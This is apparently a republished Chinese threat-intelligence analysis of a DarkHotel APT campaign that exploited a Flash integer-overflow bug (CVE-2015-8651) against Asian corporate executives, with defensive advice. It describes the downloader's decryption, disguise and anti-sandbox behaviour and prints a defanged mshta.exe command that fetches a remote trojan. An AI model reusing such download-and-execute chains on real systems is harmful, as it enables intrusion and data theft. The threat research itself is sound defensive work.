首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >境外“暗黑客栈”组织对国内企业高管发起APT攻击

境外“暗黑客栈”组织对国内企业高管发起APT攻击

作者头像
FB客服
发布于 2018-02-07 06:56:33
发布于 2018-02-07 06:56:33
2.1K0
举报
文章被收录于专栏:FreeBufFreeBuf

当你启程前往伊萨卡,但愿你的道路漫长,充满奇迹,充满发现——卡瓦菲斯(希腊)。 以此纪念2015,即将逝去的中国威胁情报元年。

0x00摘要

Adobe于12月28日发布了一个应急补丁用于修复Flash播放器的多个安全漏洞。有线索表明其中之一已被用于APT(高级可持续性)攻击,国外有媒体揣测其攻击目标为国内某著名IT企业(http://www.theregister.co.uk/2015/12/28/adobe_flash_security_update/),微步在线尚未发现任何证据支持此结论。

但溯源分析表明确有境外黑客团伙利用此漏洞针对中国及亚洲企业的高管发起APT攻击,此团伙即代号为暗黑客栈(DarkHotel)的APT攻击组织。现阶段尚不确定此攻击是否有更复杂的背景。

我们建议企业高管们立即采取以下措施:

1.立即升级Flash播放器; 2.不要点击陌生邮件的附件或链接; 3.连接酒店WIFI请慎重,收发敏感信息可用移动通信网络。

0x01 威胁事件分析

在Adobe于12月28日发布的19个安全漏洞的应急(OOB)补丁中,CVE-2015-8651被Adobe标注为已用于APT攻击。微步在线通过对多宗活跃APT威胁事件的跟踪及对CVE-2015-8651攻击的分析,确定了攻击流及攻击者身份。

通过对捕获的可疑SWF文件进行分析,确认此样本利用了Adobe Flash整数溢出漏洞(即此次Adobe修复的CVE-2015-8651漏洞)。受攻击者访问此SWF文件后,漏洞利用成功会跳转到下面这段shellcode:

其主要功能是下载一个名为update.exe的文件到系统的%temp%目录下,通过RC4解密并且通过ECHO加可执行文件的“MZ”头来构建有效的PE文件,然后运行。

Update.exe约1.3Mb,具有完整的文件属性,伪装成SSH密钥生成工具:

通过逆向分析发现,木马作者篡改和裁剪了正常的OpenSSL文件,篡改后的版本只提供一个参数:-genkeypair。无论是否传递此参数,木马文件都会首先释放一个公钥在当前目录用于干扰判断,同时进入真正的恶意代码部分。此样本未进行代码混淆,但是采用了多种反调试/反虚拟机技术及字段加密,通过检测各种系统环境来判断是否有反病毒软件及沙箱存在,比如:

Update.exe是一个Trojan Downloader,利用执行mshta.exe来下载木马文件,木马文件服务器位于冰岛。形式如下:

C:\Windows\system32\mshta.exe hxxp://****.com/image/read.php…..

0x02 攻击团伙分析

随着对此攻击事件的目标、工具、手法和过程更详细的分析,我们发现其特点和暗黑客栈(Darkhotel)有着非常惊人的一致。

暗黑客栈(Darkhotel)APT攻击团伙的踪迹最早可以追溯到2007年,其从2010年开始更多的利用企业高管在商业旅行中访问酒店网络的时机,进行APT攻击来窃取信息。

因此在2014年卡巴斯基发布针对此团队的研究报告时,将其命名为“Darkhotel”。此团伙攻击目标集中在亚太地区开展业务和投资的企业高管(如:CEO、SVP、高管及高级研发人员),攻击的行业包括大型电子制造和通信、投资、国防工业、汽车等。

此团队使用零日漏洞(特别是Flash类型)来进行攻击,并规避最新的防御措施,同时也会盗窃合法的数字证书为后门软件及监听工具进行签名。

如果有一个目标已经被有效感染,往往就会从作案点删除他们的工具,进而隐藏自己的活动踪迹。从其行动特点看,具有极高的技术能力及充沛的资源。

我们对此次事件和暗黑客栈(Darkhotel)的特点进行了对比,认为有充足理由认定其就是始作俑者。

0x03 小结

通过此事件,我们再次认识到在万物互联的年代,单纯基于漏洞的防御往往是防不胜防。

只要有足够的价值,黑客就有足够的投入和机会攻陷目标。我们需要及时的调整防御思路,平衡安全投入,更多的聚焦威胁,以威胁情报驱动安全体系建设,建立防御、检测、响应及预防一套完整的安全自适应过程。

*本文作者:Threatbook(微步在线) 是国内首家专注于安全威胁情报的创业公司,欢迎交流@安全威胁情报

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2016-01-01,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
近年APT组织常用的攻击漏洞
APT攻击(Advanced Persistent Threat,高级持续性威胁)是利用当下先进的攻击手法对特定目标进行长期持续性的网络攻击。APT攻击的高级体现在于精确的信息收集、高度的隐蔽性、以及使用各种复杂的网络基础设施、应用程序漏洞对对目标进行的精准打击。攻击人员的攻击形式更为高级和先进,称
HACK学习
2019/08/07
2K0
BlackOasis APT 和利用 0day 漏洞的新目标攻击
原文地址:https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/ 介 绍 卡巴斯基实验室一直以来与厂商们密切合作,一旦发现新的漏洞,我们会及时通知厂商并提供修复所需的所有信息。 2017年10月10日,卡巴斯基实验室高级漏洞利用防御系统确认了一个新的 Adobe Flash 0day 漏洞,该漏洞利用通过 Microsoft Office 文档传送,最终 paylo
Seebug漏洞平台
2018/03/30
8660
腾讯御见捕获Flash 0day漏洞(CVE-2018-5002)野外攻击
腾讯御见威胁情报中心近日监控到一例使用Adobe Flash 0day漏洞(CVE-2018-5002)的APT攻击,攻击者疑通过即时聊天工具和邮箱等把恶意Excel文档发送给目标人员,诱骗目标人员打开文档。实际上,该恶意Excel文档经过特别构造,被嵌入了flash对象,用户一旦打开文档电脑就会中毒。
FB客服
2018/07/30
9990
腾讯御见捕获Flash 0day漏洞(CVE-2018-5002)野外攻击
APT攻击盘点及实战(上)
我相信很多人在发文章的时候,都写了关于APT攻击相关的文章!在这里我也发一篇该文章!哈!但是我比较喜欢实战,不太喜欢理论上的东西。相信大家也跟我一样喜欢实战,恰巧在读研的时候研究方向是APT攻击的检测和防御。在本文中会以模拟2011年10月末的Nitro攻击(APT攻击之一)做一次实战模拟。
糖果
2020/01/14
2.2K0
APT攻击盘点及实战(上)
APT团伙(APT-C-01)新利用漏洞样本分析及关联挖掘
APT-C-01组织是一个长期针对国内国防、政府、科技和教育领域的重要机构实施网络间谍攻击活动的APT团伙,其最早的攻击活动可以追溯到2007年,360威胁情报中心对该团伙的活动一直保持着持续的跟踪。团伙擅长对目标实施鱼叉攻击和水坑攻击,植入修改后的ZXShell、Poison Ivy、XRAT商业木马,并使用动态域名作为其控制基础设施。
FB客服
2018/07/30
2.1K0
APT团伙(APT-C-01)新利用漏洞样本分析及关联挖掘
基于知识图谱的APT组织追踪治理
高级持续性威胁(APT)正日益成为针对政府和企业重要资产的不可忽视的网络空间重大威胁。由于APT攻击往往具有明确的攻击意图,并且其攻击手段具备极高的隐蔽性和潜伏性,传统的网络检测手段通常无法有效对其进行检测。近年来,APT攻击的检测和防御技术逐渐引起各国政府和网络安全研究者的关注。本文首先对发达国家APT相关研究进行了梳理,从战略、法规和具体的技术模型层面阐述了美国在网络空间战略和APT攻击检测及追踪方面的一些变化和取得的标志性成果;其次基于自身的研究,提出了一套结合知识图谱进行APT组织追踪的方案,并结合模拟的实际案例进行了方案的验证;最后提出了一些相关的对策建议。
绿盟科技研究通讯
2019/12/19
3K0
基于知识图谱的APT组织追踪治理
威胁情报 | 海莲花 APT 组织模仿 APT29 攻击活动分析
2023年11月,知道创宇404高级威胁情报团队成功捕获到海莲花组织最新的攻击样本。该样本以购买BMW汽车为主题,诱导攻击目标执行恶意文件。与此同时,该攻击与今年APT29的诱导主题和木马加载流程有相似之处,初步分析表明这可能是攻击者故意模仿的结果。
Seebug漏洞平台
2023/12/04
9890
威胁情报 | 海莲花 APT 组织模仿 APT29 攻击活动分析
全球高级持续性威胁(APT) 2019 年上半年研究报告
高级可持续性攻击,又称APT攻击,通常由国家背景的相关攻击组织进行攻击的活动。APT攻击常用于国家间的网络攻击行动。主要通过向目标计算机投放特种木马(俗称特马),实施窃取国家机密信息、重要企业的商业信息、破坏网络基础设施等活动,具有强烈的政治、经济目的。
墙角睡大觉
2019/09/24
2.1K0
全球高级持续性威胁(APT) 2019 年上半年研究报告
2017年Office漏洞及漏洞攻击研究报告
第一节    引子 微软Office系统软件(Word/Excel/PowerPoint等),一直是电脑上最为常用的办公软件之一,在国内外都拥有大量的用户。另一方面,利用 Office系列软件的漏洞进行网络攻击已经成为黑客惯用的手段,广泛运用于 APT攻击,抓肉鸡,传播勒索病毒等。其中一种典型的攻击方式是“鱼叉攻击”:黑客将包含漏洞的文档伪装成为一个正常的Office 文档,并精心构造文件名,然后投递到用户邮箱,如果用户不小心打开文档,恶意代码便会悄悄执行,用户完全没有感知。 另外,随着新版本的Of
昨天50还没用完
2018/06/29
8240
蛇从暗黑中袭来——响尾蛇(SideWinder) APT组织2020年上半年活动总结报告
响尾蛇(又称SideWinder,T-APT-04)是一个背景可能来源于印度的 APT 组织,该组织此前已对巴基斯坦和东南亚各国发起过多次攻击, 该组织以窃取政府, 能源, 军事, 矿产等领域的机密信息为主要目的。
Gcow安全团队
2020/07/14
1.2K0
蛇从暗黑中袭来——响尾蛇(SideWinder) APT组织2020年上半年活动总结报告
“寄生兽”(DarkHotel)针对中国外贸人士的最新攻击活动披露
腾讯御见威胁情报中心曾在2018年4月披露过"寄生兽"(DarkHotel)在2018年针对中国外贸企业高管的定向攻击活动。近期,我们再次检测到该攻击组织的最新攻击活动,依然针对跟半岛地区相关的外贸企业高管进行的攻击活动。
FB客服
2019/07/05
3.7K0
“寄生兽”(DarkHotel)针对中国外贸人士的最新攻击活动披露
多个黑产团伙利用向日葵远控软件RCE漏洞攻击传播
近日,腾讯安全威胁情报中心检测到有挖矿、远控黑产团伙利用向日葵远控软件RCE漏洞攻击企业主机和个人电脑,已有部分未修复漏洞的主机、个人电脑受害。攻击者利用漏洞入侵后可直接获得系统控制权,受害主机已被用于门罗币挖矿。
腾讯安全
2022/03/22
9.9K0
木马围城:比特币爆涨刺激挖矿木马一拥而上围猎肉鸡资源
云主机是企业数字化转型的重要基础设施,承载着重要的数据和服务价值,也逐渐成为了黑客的重点攻击对象。随着虚拟机、云主机、容器等技术的普遍应用,传统安全边界逐渐模糊,网络环境中的主机资产盲点成倍增加,黑客入侵、数据泄露、病毒木马攻击风险随之增加。 与此同时,各类数字加密货币价格迎来暴涨,2020年初至今,比特币价格一度超过了4万美元/BTC,是2019年底的10倍之多,达到了历史最高点,比特币一度摘取2020年度最佳持有资产的头衔。受比特币暴涨影响,各类数字虚拟币市值均有大幅增长,在如此大利益诱惑之下,通过传播挖矿木马来获取数字加密货币(以挖取门罗币最为普遍)的黑产团伙闻风而动,纷纷加入对主机计算资源的争夺之战。
Kendiv
2021/01/13
27.6K14
木马围城:比特币爆涨刺激挖矿木马一拥而上围猎肉鸡资源
TransparentTribe黑客组织利用简历对印度金融行业发起攻击
TransparentTribeAPT组织,又称ProjectM、C-Major,是一个来自巴基斯坦的APT攻击组织,主要攻击手段是通过鱼叉式钓鱼邮件对印度政府、军事、金融等目标发起攻击。该组织的活动最早可以追溯到2012年并在2016年3月首先被proofpoint公司披露。
IRTeam-工业安全
2022/05/10
5160
TransparentTribe黑客组织利用简历对印度金融行业发起攻击
腾讯主机安全捕获YAPI远程代码执行0day漏洞在野利用,该攻击正扩散,可使用防火墙阻截
腾讯主机安全(云镜)捕获YAPI远程代码执行0day漏洞在野利用,该攻击正在扩散。受YAPI远程代码执行0day漏洞影响,从7月第1周开始,未部署任何安全防护系统的失陷云主机数已达数千台。先后出现两次失陷高峰,一次在7月3号,一次在7月7号。BillGates僵尸网络在7月1日首先发起攻击,7月4日Mirai僵尸网络木马攻击的规模更大,已部署腾讯云防火墙(链接)的云主机成功防御此轮攻击。
腾讯安全
2021/07/08
4.7K7
腾讯主机安全捕获YAPI远程代码执行0day漏洞在野利用,该攻击正扩散,可使用防火墙阻截
贼心不死,海莲花APT组织一季度攻击活动揭秘
“海莲花”(又名APT32、OceanLotus),被认为是来自越南的APT攻击组织,自2012年活跃以来,一直针对中国的敏感目标进行攻击活动,是近几年来针对中国大陆进行攻击活动的最活跃的APT攻击组织之一。
FB客服
2019/05/14
1.9K0
贼心不死,海莲花APT组织一季度攻击活动揭秘
揭秘APT攻击: 网络世界的高级间谍
“像伊朗核电站工控系统遭遇‘震网’病毒袭击,以及专门攻击我国海事部门的黑客组织‘海莲花’,两起事件本质上都是APT攻击。”
HACK学习
2019/08/07
9880
中国「网络安全」的 12 大顶级企业实验室
1994年公安部颁布了“中华人民共和国计算机信息系统安全保护条例”,这是我国第一个计算机安全方面的法律。
CloudBest
2021/07/13
6.4K1
中国「网络安全」的 12 大顶级企业实验室
面对境外网络攻击,作为安全技术人员该如何有效防御?
雨笋教育资讯:近日,美国国家安全局(NSA)针对中国境内目标所使用的代表性网络武器——Quantum(量子)攻击平台被我国安全厂商公开披露。据NSA官方机密文档《Quantum Insert Diagrams》内容显示,Quantum(量子)攻击可以劫持全世界任意地区任意网上用户的正常网页浏览流量,进行0day(零日)漏洞利用攻击并远程植入后门程序,以实施漏洞利用、通信操控、情报窃取等一系列复杂网络攻击,直接威胁广大政企用户的数字安全。
雨笋教育
2022/03/29
1K0
面对境外网络攻击,作为安全技术人员该如何有效防御?
通报:Confluence远程代码执行漏洞(CVE-2021-26084)被黑产大规模利用
8月26日,Atlassian官方发布公告,披露了一个Atlassian Confluence 远程代码执行漏洞(CVE-2021-26084),攻击者利用漏洞可完全控制服务器。8月31日晚,腾讯云原生安全漏洞检测响应平台通过主机安全(云镜)检测到首个利用该漏洞的在野攻击案例。
腾讯安全
2021/09/06
5.4K0
通报:Confluence远程代码执行漏洞(CVE-2021-26084)被黑产大规模利用
推荐阅读
相关推荐
近年APT组织常用的攻击漏洞
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档